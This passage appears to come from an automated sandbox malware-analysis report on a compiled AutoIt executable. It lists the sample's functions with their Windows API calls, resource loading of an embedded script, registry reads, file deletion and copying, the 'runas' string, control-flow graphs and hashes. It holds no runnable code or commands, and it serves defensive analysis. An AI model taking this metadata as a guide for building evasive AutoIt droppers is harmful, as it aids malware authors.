                                            • Part of subcall function 0090434A: _memset.LIBCMT ref: 00904370
                                            • Part of subcall function 0090434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00904415
                                          Strings
                                          • This is a third-party compiled AutoIt script., xrefs: 0093D279
                                          • runas, xrefs: 0093D33A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                          • API String ID: 529118366-3287110873
                                          • Opcode ID: 936afd9a5c295f65b90d7f0adf2e90c39b93d3ce8c34a17cf9eb6b9115ee38d6
                                          • Instruction ID: 8d14808ff41e2cbb7671046c7ff0b58ac409613c958ac6238dcbfadd4972fa47
                                          • Opcode Fuzzy Hash: 936afd9a5c295f65b90d7f0adf2e90c39b93d3ce8c34a17cf9eb6b9115ee38d6
                                          • Instruction Fuzzy Hash: C351E871D08208AEDF11EBF4EC15FEDB7BCAF95754F008169F861A21E1CA706A85DB21
                                          Function 009049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 996 9049a0-904a00 call 907667 GetVersionExW call 907bcc 1001 904a06 996->1001 1002 904b0b-904b0d 996->1002 1004 904a09-904a0e 1001->1004 1003 93d767-93d773 1002->1003 1005 93d774-93d778 1003->1005 1006 904b12-904b13 1004->1006 1007 904a14 1004->1007 1009 93d77b-93d787 1005->1009 1010 93d77a 1005->1010 1008 904a15-904a4c call 907d2c call 907726 1006->1008 1007->1008 1018 904a52-904a53 1008->1018 1019 93d864-93d867 1008->1019 1009->1005 1012 93d789-93d78e 1009->1012 1010->1009 1012->1004 1014 93d794-93d79b 1012->1014 1014->1003 1016 93d79d 1014->1016 1020 93d7a2-93d7a5 1016->1020 1018->1020 1021 904a59-904a64 1018->1021 1022 93d880-93d884 1019->1022 1023 93d869 1019->1023 1024 904a93-904aaa GetCurrentProcess IsWow64Process 1020->1024 1025 93d7ab-93d7c9 1020->1025 1026 93d7ea-93d7f0 1021->1026 1027 904a6a-904a6c 1021->1027 1030 93d886-93d88f 1022->1030 1031 93d86f-93d878 1022->1031 1028 93d86c 1023->1028 1032 904aac 1024->1032 1033 904aaf-904ac0 1024->1033 1025->1024 1029 93d7cf-93d7d5 1025->1029 1038 93d7f2-93d7f5 1026->1038 1039 93d7fa-93d800 1026->1039 1034 904a72-904a75 1027->1034 1035 93d805-93d811 1027->1035 1028->1031 1036 93d7d7-93d7da 1029->1036 1037 93d7df-93d7e5 1029->1037 1030->1028 1040 93d891-93d894 1030->1040 1031->1022 1032->1033 1041 904ac2-904ad2 call 904b37 1033->1041 1042 904b2b-904b35 GetSystemInfo 1033->1042 1043 93d831-93d834 1034->1043 1044 904a7b-904a8a 1034->1044 1046 93d813-93d816 1035->1046 1047 93d81b-93d821 1035->1047 1036->1024 1037->1024 1038->1024 1039->1024 1040->1031 1053 904ad4-904ae1 call 904b37 1041->1053 1054 904b1f-904b29 GetSystemInfo 1041->1054 1045 904af8-904b08 1042->1045 1043->1024 1050 93d83a-93d84f 1043->1050 1051 904a90 1044->1051 1052 93d826-93d82c 1044->1052 1046->1024 1047->1024 1055 93d851-93d854 1050->1055 1056 93d859-93d85f 1050->1056 1051->1024 1052->1024 1061 904ae3-904ae7 GetNativeSystemInfo 1053->1061 1062 904b18-904b1d 1053->1062 1058 904ae9-904aed 1054->1058 1055->1024 1056->1024 1058->1045 1060 904aef-904af2 FreeLibrary 1058->1060 1060->1045 1061->1058 1062->1061
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 009049CD
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • GetCurrentProcess.KERNEL32(?,0098FAEC,00000000,00000000,?), ref: 00904A9A
                                          • IsWow64Process.KERNEL32(00000000), ref: 00904AA1
                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00904AE7
                                          • FreeLibrary.KERNEL32(00000000), ref: 00904AF2
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00904B23
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00904B2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: 10c7685e054eb1ba22db4dd1bfb0150b52a60317b6ed72e60b27f4925951fd38
                                          • Instruction ID: 1f8516d252c4e22523c4866dacaecf0a6ca38275e9a02a305066987e58db57b8
                                          • Opcode Fuzzy Hash: 10c7685e054eb1ba22db4dd1bfb0150b52a60317b6ed72e60b27f4925951fd38
                                          • Instruction Fuzzy Hash: 1B91A57198E7C0DECB31DB6895601AAFFF9AF29300F444D6DD1C793A81D224B908DB59
                                          Function 00904E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1063 904e89-904ea1 CreateStreamOnHGlobal 1064 904ec1-904ec6 1063->1064 1065 904ea3-904eba FindResourceExW 1063->1065 1066 93d933-93d942 LoadResource 1065->1066 1067 904ec0 1065->1067 1066->1067 1068 93d948-93d956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 93d95c-93d967 LockResource 1068->1069 1069->1067 1070 93d96d-93d98b 1069->1070 1070->1067
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00904D8E,?,?,00000000,00000000), ref: 00904E99
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00904D8E,?,?,00000000,00000000), ref: 00904EB0
                                          • LoadResource.KERNEL32(?,00000000,?,?,00904D8E,?,?,00000000,00000000,?,?,?,?,?,?,00904E2F), ref: 0093D937
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00904D8E,?,?,00000000,00000000,?,?,?,?,?,?,00904E2F), ref: 0093D94C
                                          • LockResource.KERNEL32(00904D8E,?,?,00904D8E,?,?,00000000,00000000,?,?,?,?,?,?,00904E2F,00000000), ref: 0093D95F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 00781eccf784d15a77c734b4da56e3fc8ccfceb5030734bd9a2c583c0d07e5d7
                                          • Instruction ID: a393a68b2efeee1a7690aff6c39845d834bb41a2f14f2af46353014746081476
                                          • Opcode Fuzzy Hash: 00781eccf784d15a77c734b4da56e3fc8ccfceb5030734bd9a2c583c0d07e5d7
                                          • Instruction Fuzzy Hash: E1115AB5240700BFD7218B65EC58F677BBEFBC9B21F20426CF516C62A0DB61E8019A60
                                          Function 0090FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID:
                                          • API String ID: 3964851224-0
                                          • Opcode ID: 4bb4d6378120b73b8694f8fdc22545bf5ce0c4a8d2dfb30c99fd0af54ae32c52
                                          • Instruction ID: 1e6c664c8db06971b85d754c23974e1cf9455cdd3638a543c293dee175dc62a0
                                          • Opcode Fuzzy Hash: 4bb4d6378120b73b8694f8fdc22545bf5ce0c4a8d2dfb30c99fd0af54ae32c52
                                          • Instruction Fuzzy Hash: 0A925B706083459FD720DF14C480B6AB7E5BFC9304F14896DE89A9B392D7B6EC85CB92
                                          Function 0096445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,0093E398), ref: 0096446A
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 0096447B
                                          • FindClose.KERNEL32(00000000), ref: 0096448B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: e11692719b09a3cd4879ee1572fccb195bfc9c34d13e55b6442cb4dff6b96aaf
                                          • Instruction ID: c8c7bb303fdea854309c93c4274b4676679346e3d3b604b5d681b2d7e0957393
                                          • Opcode Fuzzy Hash: e11692719b09a3cd4879ee1572fccb195bfc9c34d13e55b6442cb4dff6b96aaf
                                          • Instruction Fuzzy Hash: ACE0D8334245006B46106B78EC0E4E9779C9E45375F100716F835C11E0EB749900A696
                                          Function 0090E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                          Download Yara Rule
                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00943E62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 785f019c4d581ebb8af895bb838dea54113b3e728fca58fd1c89774761f6351b
                                          • Instruction ID: 7916cec20e15cc15d370e81ebef83efa8536c149b4df43628c5c89457c7c980e
                                          • Opcode Fuzzy Hash: 785f019c4d581ebb8af895bb838dea54113b3e728fca58fd1c89774761f6351b
                                          • Instruction Fuzzy Hash: 2DA2AC75E04219CFCB24CF58C490AAEB7B6FF58314F248869E916AB391D735ED42CB90
                                          Function 009109D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00910A5B
                                          • timeGetTime.WINMM ref: 00910D16
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00910E53
                                          • Sleep.KERNEL32(0000000A), ref: 00910E61
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00910EFA
                                          • DestroyWindow.USER32 ref: 00910F06
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00910F20
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00944E83
                                          • TranslateMessage.USER32(?), ref: 00945C60
                                          • DispatchMessageW.USER32(?), ref: 00945C6E
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00945C82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                          • API String ID: 4212290369-3242690629
                                          • Opcode ID: a76eed1fea8b4d2998a5d675daf00f1764ab8c4825632158c201cfe3d0c08bff
                                          • Instruction ID: 0a06384bb70c38050676e2eee668aa041d82f4311b77b0754a782d27a65cddd9
                                          • Opcode Fuzzy Hash: a76eed1fea8b4d2998a5d675daf00f1764ab8c4825632158c201cfe3d0c08bff
                                          • Instruction Fuzzy Hash: F7B2D170608745DFD724DF64C884FAAB7E8BFC4304F15491DE49A972A2DBB5E884CB82
                                          Function 00969155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00968F5F: __time64.LIBCMT ref: 00968F69
                                            • Part of subcall function 00904EE5: _fseek.LIBCMT ref: 00904EFD
                                          • __wsplitpath.LIBCMT ref: 00969234
                                            • Part of subcall function 009240FB: __wsplitpath_helper.LIBCMT ref: 0092413B
                                          • _wcscpy.LIBCMT ref: 00969247
                                          • _wcscat.LIBCMT ref: 0096925A
                                          • __wsplitpath.LIBCMT ref: 0096927F
                                          • _wcscat.LIBCMT ref: 00969295
                                          • _wcscat.LIBCMT ref: 009692A8
                                            • Part of subcall function 00968FA5: _memmove.LIBCMT ref: 00968FDE
                                            • Part of subcall function 00968FA5: _memmove.LIBCMT ref: 00968FED
                                          • _wcscmp.LIBCMT ref: 009691EF
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969824
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969837
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00969452
                                          • _wcsncpy.LIBCMT ref: 009694C5
                                          • DeleteFileW.KERNEL32(?,?), ref: 009694FB
                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00969511
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00969522
                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00969534
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: 8b6055cc7cbc71ab22c586df1fe5163bd196a417169dd27f7df38fcb8eaaa8a5
                                          • Instruction ID: 8f38e37cf6a8a496b9e1ffbb09a74450b9770307cc0bf58dd7bc964134270ce8
                                          • Opcode Fuzzy Hash: 8b6055cc7cbc71ab22c586df1fe5163bd196a417169dd27f7df38fcb8eaaa8a5
                                          • Instruction Fuzzy Hash: 8AC12BB1D00229AEDF21DF95CC85ADEB7BDAF85310F0040AAF609E6251DB309A858F65
                                          Function 00903015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00903074
                                          • RegisterClassExW.USER32(00000030), ref: 0090309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 009030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009030DC
                                          • LoadIconW.USER32(000000A9), ref: 009030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: af67d883a157063cebe034b1e30aaac0f470dd6b52fd7ae3d3c555e941181754
                                          • Instruction ID: 2530ae24763e5db144550ab3dae87bf8a6862a06acc79c8cc5c35c2aafd5a798
                                          • Opcode Fuzzy Hash: af67d883a157063cebe034b1e30aaac0f470dd6b52fd7ae3d3c555e941181754
                                          • Instruction Fuzzy Hash: 7A3147B1869349AFDB10CFA4EC88A8DBBF0FB08310F14452EE580E62A0D7B91585DF51
                                          Function 00903041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00903074
                                          • RegisterClassExW.USER32(00000030), ref: 0090309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 009030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009030DC
                                          • LoadIconW.USER32(000000A9), ref: 009030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 700c21b2831df1ed2e2009a263c3b99e270f55a99caced4fd26e113853ea397f
                                          • Instruction ID: be950098e94e53055bc250c19dd4325ebe50229326f88131538d2acca3dfea9d
                                          • Opcode Fuzzy Hash: 700c21b2831df1ed2e2009a263c3b99e270f55a99caced4fd26e113853ea397f
                                          • Instruction Fuzzy Hash: 4521C7B1D25318AFEB00DFA4EC59B9DBBF4FB08710F10512AF511A63A0D7B15584AF91
                                          Function 0090708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00904706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009C52F8,?,009037AE,?), ref: 00904724
                                            • Part of subcall function 0092050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00907165), ref: 0092052D
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009071A8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0093E8C8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0093E909
                                          • RegCloseKey.ADVAPI32(?), ref: 0093E947
                                          • _wcscat.LIBCMT ref: 0093E9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: 4d42abb2dc067e41da9dc82e711dacf0087b6532fbb0c3c7036778c3cd03ecd3
                                          • Instruction ID: 45b446badafec6114d1082686f3fd1c57aeb14ade250ea6f6c3c555f1ee3e92c
                                          • Opcode Fuzzy Hash: 4d42abb2dc067e41da9dc82e711dacf0087b6532fbb0c3c7036778c3cd03ecd3
                                          • Instruction Fuzzy Hash: 48717D71918301AEC700EF69E841E6BBBE8FF85350F40092EF455C72E1EB71A948DB52
                                          Function 00903A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00903A50
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00903A5F
                                          • LoadIconW.USER32(00000063), ref: 00903A76
                                          • LoadIconW.USER32(000000A4), ref: 00903A88
                                          • LoadIconW.USER32(000000A2), ref: 00903A9A
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00903AC0
                                          • RegisterClassExW.USER32(?), ref: 00903B16
                                            • Part of subcall function 00903041: GetSysColorBrush.USER32(0000000F), ref: 00903074
                                            • Part of subcall function 00903041: RegisterClassExW.USER32(00000030), ref: 0090309E
                                            • Part of subcall function 00903041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009030AF
                                            • Part of subcall function 00903041: InitCommonControlsEx.COMCTL32(?), ref: 009030CC
                                            • Part of subcall function 00903041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009030DC
                                            • Part of subcall function 00903041: LoadIconW.USER32(000000A9), ref: 009030F2
                                            • Part of subcall function 00903041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 0fe9759e85ab0103f815ecdc0ac7f80ecf38b52b77733fafe07925c783c93f6a
                                          • Instruction ID: 03e98f1c0dee34aeb62fa1a657242bbd00d0c7df59bf81e98e724aa6398ccc1e
                                          • Opcode Fuzzy Hash: 0fe9759e85ab0103f815ecdc0ac7f80ecf38b52b77733fafe07925c783c93f6a
                                          • Instruction Fuzzy Hash: EF214870D29308AFEB10DFA4EC19F9D7BF4FB08711F11412AE510A62B1D3B56690AF84
                                          Function 00903633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
